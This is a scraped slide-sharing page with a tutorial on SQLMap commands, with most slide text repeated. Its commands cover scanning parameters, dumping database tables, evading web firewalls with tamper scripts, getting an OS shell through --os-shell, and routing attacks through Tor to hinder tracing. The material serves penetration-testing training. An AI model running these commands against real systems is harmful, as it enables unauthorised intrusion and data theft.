Important SQLMap commands
zubairusman8
387 views
29 slides
Jun 06, 2021
Slide 1 of 29
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
About This Presentation
The SQLMap tool can be found in every penetration tester’s toolbox. It is one of the most popular and powerful tools when it comes to exploiting SQL injection vulnerability, which itself tops the OWASP list of Top 10 Vulnerabilities. From confirming the SQL injection vulnerability to extracting th...
Slide Content
Important SQLMap commands
By M.Zubair Usman (Mr-Popeye)
<https://web.facebook.com/scoltech>
SQLMap commands
6/5/2021
By M.Zubair Usman (Mr-Popeye)
<https://web.facebook.com/scoltech>
SQLMap commands
6/5/2021
GET request
●sqlmap -u http://site-to-test.com/test.php?id=1 -p id
●sqlmap -u http://site-to-test.com/test.php?id=1*
●-u: URL to scan
●-p: parameter to scan
●*: Parameter to scan (if -p switch is not provided)
●sqlmap -u http://site-to-test.com/test.php?id=1 -p id
●sqlmap -u http://site-to-test.com/test.php?id=1*
●-u: URL to scan
●-p: parameter to scan
●*: Parameter to scan (if -p switch is not provided)
POST request
●We can provide the data being passed in the POST request body to scan by the
SQLMap tool.
●sqlmap -u http://site-to-test.com/admin/index.php –
data=”user=admin&password=admin” -p user
●–data = POST data
●We can provide the data being passed in the POST request body to scan by the
SQLMap tool.
●sqlmap -u http://site-to-test.com/admin/index.php –
data=”user=admin&password=admin” -p user
●–data = POST data
POST request
●We can provide the data being passed in the POST request body to scan by the
SQLMap tool.
●sqlmap -u http://site-to-test.com/admin/index.php –
data=”user=admin&password=admin” -p user
●–data = POST data
●We can provide the data being passed in the POST request body to scan by the
SQLMap tool.
●sqlmap -u http://site-to-test.com/admin/index.php –
data=”user=admin&password=admin” -p user
●–data = POST data
Scanning POST login pages
●Post login pages are authorized by the cookie header, which is passed in the HTTP
header of a GET/POST request. To scan the post login page(s), we have to provide
the valid cookie to SQLMap.
●sqlmap -u http://192.168.202.163/admin/index.php?id=1 –cookie=”cookie value”
●/admin/index.php?id=1 is a post login page
●Post login pages are authorized by the cookie header, which is passed in the HTTP
header of a GET/POST request. To scan the post login page(s), we have to provide
the valid cookie to SQLMap.
●sqlmap -u http://192.168.202.163/admin/index.php?id=1 –cookie=”cookie value”
●/admin/index.php?id=1 is a post login page
Scanning POST login pages
●Similarly, many of the pages are protected by the User-Agent
or Referrer header. The same can be included in the
command:
●sqlmap -u http://192.168.202.163/admin/index.php?id=1 –
user-agent=infosec
●sqlmap -u http://192.168.202.163/admin/index.php?id=1 –
referer= http://192.168.202.163/admin/index.php
●Similarly, many of the pages are protected by the User-Agent
or Referrer header. The same can be included in the
command:
●sqlmap -u http://192.168.202.163/admin/index.php?id=1 –
user-agent=infosec
●sqlmap -u http://192.168.202.163/admin/index.php?id=1 –
referer= http://192.168.202.163/admin/index.php
CRAWL
●Crawl is an important option which allows the SQLMap tool to crawl the website,
starting from the root location. The depth to crawl can be defined in the command.
●sqlmap -u http://192.168.202.160/ –crawl=1
●–crawl: Define a depth to crawl. (Example: Defining 2 will allow the tool to crawl up to
two directories)
●Crawl is an important option which allows the SQLMap tool to crawl the website,
starting from the root location. The depth to crawl can be defined in the command.
●sqlmap -u http://192.168.202.160/ –crawl=1
●–crawl: Define a depth to crawl. (Example: Defining 2 will allow the tool to crawl up to
two directories)
CRAWL
●If we want to exclude any page from the crawler’s scope we can define by –crawl-
exclude. This is a useful option when we are crawling a post login page.
●sqlmap -u http://192.168.202.163/ –crawl=3 –cookie=”cookie value” –crawl-
exclude=”logout”
●This command will crawl the website up to three directories and exclude any URL
where “logout” keyword is present.
●If we want to exclude any page from the crawler’s scope we can define by –crawl-
exclude. This is a useful option when we are crawling a post login page.
●sqlmap -u http://192.168.202.163/ –crawl=3 –cookie=”cookie value” –crawl-
exclude=”logout”
●This command will crawl the website up to three directories and exclude any URL
where “logout” keyword is present.
SQLMap through proxy
●We can define a proxy’s details from where we allow the request to pass. If we want
to pass the request through a proxy tool like Burp, start Burp Suite and configure it to
run on localhost on port 8080. Now use the following SQLMap command:
●sqlmap -u http://192.168.202.162/cat.php?id=1 -p id –proxy=”http://localhost:8080″
●We can define a proxy’s details from where we allow the request to pass. If we want
to pass the request through a proxy tool like Burp, start Burp Suite and configure it to
run on localhost on port 8080. Now use the following SQLMap command:
●sqlmap -u http://192.168.202.162/cat.php?id=1 -p id –proxy=”http://localhost:8080″
SQLMap through proxy
●This will check if the request has a keyword like “union.” If yes,
then replace it with “UnIoN.”
●In a scenario where the application is accessible only through
proxy server, the same can be defined using the following
command:
●sqlmap -u http://192.168.202.162/cat.php?id=1 -p id –
proxy=”http://localhost:8080″ –proxy-cred=username:password
●This will check if the request has a keyword like “union.” If yes,
then replace it with “UnIoN.”
●In a scenario where the application is accessible only through
proxy server, the same can be defined using the following
command:
●sqlmap -u http://192.168.202.162/cat.php?id=1 -p id –
proxy=”http://localhost:8080″ –proxy-cred=username:password
Batch
●The batch command is used for non-interactive sessions. When we are trying to
scan something, SQLMap may ask us to provide input during the scan: for example,
while using the crawl feature, the tool asks the user if the user want to scan the
identified URL. When –batch is defined in the command, the tool uses a default value
to proceed without asking the user.
●The batch command is used for non-interactive sessions. When we are trying to
scan something, SQLMap may ask us to provide input during the scan: for example,
while using the crawl feature, the tool asks the user if the user want to scan the
identified URL. When –batch is defined in the command, the tool uses a default value
to proceed without asking the user.
Form
●A page URL with a form field (say login page) can be provided along with the –form
option to parse the page and guide the user to test the identified fields.
●A page URL with a form field (say login page) can be provided along with the –form
option to parse the page and guide the user to test the identified fields.
Form
●Now pages with large number of form fields can be tested effectively using –form
and –batch option together. This will parse the page and check for form fields and
automatically provide the input on behalf on the user.
●If the entire application has to be scanned, the crawl option along with form and
switch can be used.
●Now pages with large number of form fields can be tested effectively using –form
and –batch option together. This will parse the page and check for form fields and
automatically provide the input on behalf on the user.
●If the entire application has to be scanned, the crawl option along with form and
switch can be used.
Threads
●The threads option allows the user to define the number of concurrent requests to be
sent by the SQLMap tool. This would reduce the overall testing time. This should not
be kept to a higher value, as it may impact the accuracy of the result.
●The threads option allows the user to define the number of concurrent requests to be
sent by the SQLMap tool. This would reduce the overall testing time. This should not
be kept to a higher value, as it may impact the accuracy of the result.
Risk and level
●Risk allows the type of payloads used by the tool. By default, it
uses value 1 and can be configured up to level 3. Level 3, being
the maximum, includes some heavy SQL queries.
●The level defines the number of checks/payload to be
performed. The value ranges from 1 to 5. 5, being the
maximum, includes large number of payloads in the scan.
●The risk and level are recommended to be increased if
SQLMap is not able to detect the injection in default settings.
●Risk allows the type of payloads used by the tool. By default, it
uses value 1 and can be configured up to level 3. Level 3, being
the maximum, includes some heavy SQL queries.
●The level defines the number of checks/payload to be
performed. The value ranges from 1 to 5. 5, being the
maximum, includes large number of payloads in the scan.
●The risk and level are recommended to be increased if
SQLMap is not able to detect the injection in default settings.
Verbose
●In case we want to see the payload being sent by the tool, we can use the verbose
option. The values range from 1 to 6.
●In case we want to see the payload being sent by the tool, we can use the verbose
option. The values range from 1 to 6.
Database enumeration
●As we know SQLMap is majorly used for SQL injection exploitation, let’s see some of
the commands to enumerate the database through an application vulnerable to SQL
injection.
●1. –dbs: This option is used to enumerate the database.
●As we know SQLMap is majorly used for SQL injection exploitation, let’s see some of
the commands to enumerate the database through an application vulnerable to SQL
injection.
●1. –dbs: This option is used to enumerate the database.
Database enumeration
●Now we have the database name. To extract the table for database “photoblog,” run
the following command:
●Now we have the database name. To extract the table for database “photoblog,” run
the following command:
Database enumeration
●To extract the column details from the table “users,” run the following command:
●To extract the column details from the table “users,” run the following command:
Database enumeration
●To dump the data for table “users,” use the –dump command:
●To dump the data for table “users,” use the –dump command:
Database enumeration
●To identify the current database user:
●To identify the current database user:
Database enumeration
●To identify the current database name:
●To identify the current database name:
Database enumeration
●To identify the privileges, roles, and if current DB user is the DB admin:
●To identify the privileges, roles, and if current DB user is the DB admin:
Bypassing WAF using tamper
script
●Many times, we come across a scenario where the application is kept behind the
web application firewall (WAF). To check if the site is protected by WAF, we can use
the following options:
●–identify-waf
●Once the WAF is identified, we can use the tamper script to attack the WAF-
protected applications. The tamper script can modify the request to escape WAF
detection. The scripts can be found under /usr/share/sqlmap/tamper/ directory.
script
●Many times, we come across a scenario where the application is kept behind the
web application firewall (WAF). To check if the site is protected by WAF, we can use
the following options:
●–identify-waf
●Once the WAF is identified, we can use the tamper script to attack the WAF-
protected applications. The tamper script can modify the request to escape WAF
detection. The scripts can be found under /usr/share/sqlmap/tamper/ directory.
Running system commands
●We can run the OS/system level commands if the current
database user has DBA rights. We can use the following
options:
●For a Linux server:
●sqlmap -u http://192.168.202.162/cat.php?id=1 –os-shell
●For a Windows server:
●sqlmap -u http://192.168.202.162/cat.php?id=1 –os-cmd
<cmd>
●We can run the OS/system level commands if the current
database user has DBA rights. We can use the following
options:
●For a Linux server:
●sqlmap -u http://192.168.202.162/cat.php?id=1 –os-shell
●For a Windows server:
●sqlmap -u http://192.168.202.162/cat.php?id=1 –os-cmd
<cmd>
Running SQL queries
●We can run the SQL statement on the database by running the following commands:
●sqlmap -u 192.168.202.164/cat.php?id=2 –sql-shell
●We can run the SQL statement on the database by running the following commands:
●sqlmap -u 192.168.202.164/cat.php?id=2 –sql-shell
Other options
●Some other options include:
●1. Scanning a page protected by HTTP authentication like Basic, NTLM and Digest:
●sqlmap -u http://example.com/admin.aspx –auth-type Basic –auth-cred
“admin:admin”
●2. Scanning a page protected by a key-based authentication
●sqlmap -u http://example.com/admin.aspx —auth-file=<path to PEM certificate or
private key file>
●3. To randomize attacking IPs (this can help in cases like WAF detection, or when
hiding the attacking source would increase the difficulty of tracing the IP).
●To use the default Tor anonymity network:
●sqlmap -u http://example.com/admin.aspx –tor
●Some other options include:
●1. Scanning a page protected by HTTP authentication like Basic, NTLM and Digest:
●sqlmap -u http://example.com/admin.aspx –auth-type Basic –auth-cred
“admin:admin”
●2. Scanning a page protected by a key-based authentication
●sqlmap -u http://example.com/admin.aspx —auth-file=<path to PEM certificate or
private key file>
●3. To randomize attacking IPs (this can help in cases like WAF detection, or when
hiding the attacking source would increase the difficulty of tracing the IP).
●To use the default Tor anonymity network:
●sqlmap -u http://example.com/admin.aspx –tor
Other options
●To define a Tor port:
●sqlmap -u http://example.com/admin.aspx –tor-port=<tor proxy port>
●4. If delay is required between each HTTP request:
●sqlmap -u http://example.com/admin.aspx –delay=1 #1 second delay
●5. If a page is protected by a CSRF token, we can include the same in the
command:
●sqlmap -u http://example.com/admin.aspx –csrf-token=<csrf token>
●6.Second-Order SQL injection: In this type of SQL injection, the SQL payload is
stored in the database and retrieved later when accessing a different page. We
provide a URL, which will be requested by SQLMap tool after every injection. We can
instruct the SQLMap tool to test this injection by using the following commands:
●sqlmap -r /root/Desktop/Burp.txt –second-order “http://target/vulnerbalepage.php”
●The Burp.txt file contains the request on which injection is to be performed.
●–second-order “URL” contains the URL which will be accessed by SQLMap after
every injection.
●To define a Tor port:
●sqlmap -u http://example.com/admin.aspx –tor-port=<tor proxy port>
●4. If delay is required between each HTTP request:
●sqlmap -u http://example.com/admin.aspx –delay=1 #1 second delay
●5. If a page is protected by a CSRF token, we can include the same in the
command:
●sqlmap -u http://example.com/admin.aspx –csrf-token=<csrf token>
●6.Second-Order SQL injection: In this type of SQL injection, the SQL payload is
stored in the database and retrieved later when accessing a different page. We
provide a URL, which will be requested by SQLMap tool after every injection. We can
instruct the SQLMap tool to test this injection by using the following commands:
●sqlmap -r /root/Desktop/Burp.txt –second-order “http://target/vulnerbalepage.php”
●The Burp.txt file contains the request on which injection is to be performed.
●–second-order “URL” contains the URL which will be accessed by SQLMap after
every injection.
Categories
GeneralDownload
Download Slideshow Get the original presentation fileQuick Actions
Statistics
- Views 387
- Slides 29
- Favorites 1
- Age 1639 days
Related Slideshows
22
Pray For The Peace Of Jerusalem and You Will Prosper
RodolfoMoralesMarcuc
30 views
26
Don_t_Waste_Your_Life_God.....powerpoint
chalobrido8
32 views
31
VILLASUR_FACTORS_TO_CONSIDER_IN_PLATING_SALAD_10-13.pdf
JaiJai148317
30 views
14
Fertility awareness methods for women in the society
Isaiah47
29 views
35
Chapter 5 Arithmetic Functions Computer Organisation and Architecture
RitikSharma297999
26 views
5
syakira bhasa inggris (1) (1).pptx.......
ourcommunity56
28 views